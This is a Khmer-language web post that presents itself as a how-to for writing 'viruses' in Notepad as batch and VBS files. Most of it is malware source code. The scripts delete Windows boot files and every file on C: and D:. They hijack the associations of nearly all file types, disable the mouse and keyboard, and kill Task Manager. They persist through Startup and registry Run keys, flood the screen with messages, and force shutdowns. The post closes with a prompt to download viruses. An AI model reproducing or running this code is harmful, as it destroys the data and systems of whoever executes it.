មេរោគប្រើ Notepad​ & VBS

ITលោកអ្នក Save ដាក់ឈ្មោះ virus កន្ទុយ .BAT និង .VBS:
1) មេរោគ virus បំផ្លាញ windows:
Code:

@echo off
msg *virus activated*
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg *Computer Over. Virus=Very Yes.*
shutdown -s -t 10 -c ” “

2) ប្រភេទមេរោគ virus ធ្វើអោយកណ្តុរ, Keyboard,task manager ផ្លាស់ប្តូរព័ត៌មាន:
code:
@echo off
prompt $P $G
assoc .doc  = fA1luRe
assoc .docx  = fA1luRe
assoc .log  = fA1luRe
assoc .msg  = fA1luRe
assoc .pages  = fA1luRe
assoc .rtf  = fA1luRe
assoc .txt  = fA1luRe
assoc .wpd  = fA1luRe
assoc .wps  = fA1luRe
assoc .accdb  = fA1luRe
assoc .blg  = fA1luRe
assoc .csv  = fA1luRe
assoc .dat  = fA1luRe
assoc .db  = fA1luRe
assoc .efx  = fA1luRe
assoc .mdb  = fA1luRe
assoc .pdb  = fA1luRe
assoc .pps  = fA1luRe
assoc .ppt  = fA1luRe
assoc .pptx  = fA1luRe
assoc .sdb  = fA1luRe
assoc .sdf  = fA1luRe
assoc .sql  = fA1luRe
assoc .vcf  = fA1luRe
assoc .wks  = fA1luRe
assoc .xls  = fA1luRe
assoc .xlsx  = fA1luRe
assoc .xml  = fA1luRe
assoc .bmp  = fA1luRe
assoc .gif  = fA1luRe
assoc .jpg  = fA1luRe
assoc .png  = fA1luRe
assoc .psd  = fA1luRe
assoc .psp  = fA1luRe
assoc .thm  = fA1luRe
assoc .tif  = fA1luRe
assoc .ai  = fA1luRe
assoc .drw  = fA1luRe
assoc .eps  = fA1luRe
assoc .ps  = fA1luRe
assoc .svg  = fA1luRe
assoc .3dm  = fA1luRe
assoc .dwg  = fA1luRe
assoc .dxf  = fA1luRe
assoc .pln  = fA1luRe
assoc .indd  = fA1luRe
assoc .pct  = fA1luRe
assoc .pdf  = fA1luRe
assoc .qxd  = fA1luRe
assoc .qxp  = fA1luRe
assoc .rels  = fA1luRe
assoc .aac  = fA1luRe
assoc .aif  = fA1luRe
assoc .iff  = fA1luRe
assoc .m3u  = fA1luRe
assoc .mid  = fA1luRe
assoc .mp3  = fA1luRe
assoc .mpa  = fA1luRe
assoc .ra  = fA1luRe
assoc .wav  = fA1luRe
assoc .wma  = fA1luRe
assoc .3g2  = fA1luRe
assoc .3gp  = fA1luRe
assoc .asf  = fA1luRe
assoc .asx  = fA1luRe
assoc .avi  = fA1luRe
assoc .flv  = fA1luRe
assoc .mov  = fA1luRe
assoc .mp4  = fA1luRe
assoc .mpg  = fA1luRe
assoc .rm  = fA1luRe
assoc .swf  = fA1luRe
assoc .vob  = fA1luRe
assoc .wmv  = fA1luRe
assoc .asp  = fA1luRe
assoc .cer  = fA1luRe
assoc .csr  = fA1luRe
assoc .css  = fA1luRe
assoc .htm  = fA1luRe
assoc .html  = fA1luRe
assoc .js  = fA1luRe
assoc .jsp  = fA1luRe
assoc .php  = fA1luRe
assoc .rss  = fA1luRe
assoc .tvpi  = fA1luRe
assoc .tvvi  = fA1luRe
assoc .xhtml  = fA1luRe
assoc .fnt  = fA1luRe
assoc .fon  = fA1luRe
assoc .otf  = fA1luRe
assoc .ttf  = fA1luRe
assoc .8bi  = fA1luRe
assoc .plugin  = fA1luRe
assoc .xll  = fA1luRe
assoc .cab  = fA1luRe
assoc .cpl  = fA1luRe
assoc .cur  = fA1luRe
assoc .dll  = fA1luRe
assoc .dmp  = fA1luRe
assoc .drv  = fA1luRe
assoc .key  = fA1luRe
assoc .lnk  = fA1luRe
assoc .sys  = fA1luRe
assoc .cfg  = fA1luRe
assoc .ini  = fA1luRe
assoc .keychain  = fA1luRe
assoc .prf  = fA1luRe
assoc .app  = fA1luRe
assoc .bat  = fA1luRe
assoc .cgi  = fA1luRe
assoc .com  = fA1luRe
assoc .exe  = fA1luRe
assoc .pif  = fA1luRe
assoc .vb  = fA1luRe
assoc .ws  = fA1luRe
assoc .7z  = fA1luRe
assoc .deb  = fA1luRe
assoc .gz  = fA1luRe
assoc .pkg  = fA1luRe
assoc .rar  = fA1luRe
assoc .sit  = fA1luRe
assoc .sitx  = fA1luRe
assoc .tar.gz  = fA1luRe
assoc .zip  = fA1luRe
assoc .zipx  = fA1luRe
assoc .bin  = fA1luRe
assoc .hqx  = fA1luRe
assoc .mim  = fA1luRe
assoc .uue  = fA1luRe
assoc .c  = fA1luRe
assoc .cpp  = fA1luRe
assoc .dtd  = fA1luRe
assoc .java  = fA1luRe
assoc .pl  = fA1luRe
assoc .bak  = fA1luRe
assoc .bup  = fA1luRe
assoc .gho  = fA1luRe
assoc .ori  = fA1luRe
assoc .tmp  = fA1luRe
assoc .dmg  = fA1luRe
assoc .iso  = fA1luRe
assoc .toast  = fA1luRe
assoc .vcd  = fA1luRe
assoc .gam  = fA1luRe
assoc .nes  = fA1luRe
assoc .rom  = fA1luRe
assoc .sav  = fA1luRe
assoc .dbx  = fA1luRe
assoc .msi  = fA1luRe
assoc .part  = fA1luRe
assoc .torrent  = fA1luRe
assoc .yps  = fA1luRe
rundll32.exe mouse, disable
rundll32.exe keyboard, disable
copy setup.bat %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
copy setup.bat %windir%\System32
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v fA1luRe /t REG_SZ /d %windir%\System32\setup.bat
taskkill /f /im taskmgr.exe
reg restore HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr = 1
shutdown -s -f -t 10 -c “PwN3D by fA1luRe!!!”

3) ធ្វើអោយលោតចុះឡើង mess:
Code:
@ECHO off
:Begin
msg * kdor thom
msg * kdor thom
msg * kdor thom
msg * kdor thom
msg * kdor thom
GOTO BEGIN
VD:
@ECHO off
:Begin
msg * Hi
msg * oun samlanh ?
msg * bong srolanh oun ?
msg * oun dek nov ?
msg * bb oun!!
GOTO BEGIN
4) បិទកុំព្យូទ័រដោយស្វ័យប្រវត្តិ:
Code:
@echo off
msg *  lời cảnh báo
shutdown -c “lời cảnh báo” -s
VD:
@echo off
msg * I LOVE YOU
shutdown -c “Error! bye ounsamlanh!” -s

មេរោគសរសេរ កម្មវិធី Visual basic Script .VBS
1)មេរោគផ្ញើ សារ:
Code:
text1=msgbox(“Warning you”,42,”Warning”)

2)បញ្ឈប់កុំព្យូទ័រ:
Code:
msgbox”Error !”
On Error Resume Next
Set vip_xinh = Createobject(“scripting.filesystemobject”)
vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0 )& “\ vip_xinh.vbs”
Set vip_xinh2= CreateObject(“WScript.Shell”)
vip_xinh2.regwrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\die”,”wscript.exe “& vip_xinh.GetSpecialFolder(0)& “\ vip_xinh.vbs %”

On Error Resume Next
Const vic = “D:\”
Delvic
Sub Delvic()
Dim fso
Set fso = CreateObject(“Scripting.FileSystemObject”)
fso.DeleteFile vic & “*.*” , True
fso.DeleteFolder vic & “*” , True
End Sub

On Error Resume Next
Const vic1 = “C:\windows\”
Delvic1
Sub Delvic1()
Dim fso1
Set fso1 = CreateObject(“Scripting.FileSystemObject”)
fso1.DeleteFile vic1 & “*.*” , True
fso1.DeleteFolder vic1 & “*” , True
End Sub

On Error Resume Next
Const vic2 = “C:\”
Delvic2
Sub Delvic2()
Dim fso2
Set fso2 = CreateObject(“Scripting.FileSystemObject”)
fso2.DeleteFile vic2 & “*.*” , True
fso2.DeleteFolder vic2 & “*” , True
End Sub

On Error Resume Next
Set treomay= CreateObject(“WScript.Shell”)
Do
treomay.run “notepad”,false
loop

 ដោនឡូត មេរោគ យកទៅ រត់លេង DOWNLOAD VIRUSES